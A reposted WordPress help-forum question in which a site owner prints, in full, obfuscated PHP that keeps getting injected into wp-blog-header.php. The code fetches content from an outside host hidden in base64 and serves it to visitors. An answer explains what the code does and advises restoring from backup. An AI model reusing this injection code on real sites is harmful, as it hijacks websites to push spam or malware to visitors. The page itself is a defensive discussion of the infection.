IT Nursery
  • 1010 Avenue of the Moon
    New York, NY 10018 US.
  • Mon - Sat 8.00 - 18.00
    Sunday: Closed
  • Get A Quote
  • WordPress

    • How to prevent bot or someone to modify any file automatically?

    • IT Nursery
    • May 21, 2022
    • 0

    Someone modifying daily our website file wp-blog-header.php.

    They are adding below code which generates unneceassy pages automatic in our website, Code is :

    $e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);

if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
    basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
        (stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {

    $at = "base64_" . "decode";

    $ch = curl_init($at("aHR0cDovL3dwYWRtaW5hZG1pLmNvbS8/") . "7d09c3986906332c22b598b781b38d33" . $p);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
    );

    if (isset($_SERVER["HTTP_USER_AGENT"]))
        curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);

    if (isset($_SERVER["HTTP_REFERER"]))
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

    $ci = "curl_ex" . "ec";

    $data = $ci($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

    if (strlen($data) > 255 && $code == 200) {
        echo $data; exit;
    } else if ($data && ($code == 301 || $code == 302)) {
        header("Location: " . trim($data), true, $code); exit;
    }
}

    How can we prevent it? I have removed yesterday above script and today it is in there again.

    I have put following in .htaccess, But it did not help :

    <Files wp-blog-header.php>
deny from all
</Files>

    2 Answers
    2

    I’m not a security expert, but the code you include in your question roughly does this:

    1. Check if the request is not for a static page (it can’t insert anything in that)
    2. Check if the request is not from scraper bots Ahrefsbot and MJ12bot.
    3. If both checks are passed make a connection with the server at wpadminadmi.com (this happens on the line that starts with $ch = curl_init)
    4. Retrieve some code from that site.
    5. Include that code ($data) in your site.

    So, your site has been hacked and you are probably distributing malware from your site to the devices of your visitors.

    Your question does not include any hints as where the malware might be hiding in your own site. What you see is not the malware itself, but another piece of malware it generates.

    The root problem may be anywhere, ranging from a compromised ftp-account to a malicious plugin/theme. Your best option is to wipe the site and install a backup. If you don’t have any, you’ll have to go through the motions.

    Tags:

    Leave a Reply

    Your email address will not be published. Required fields are marked *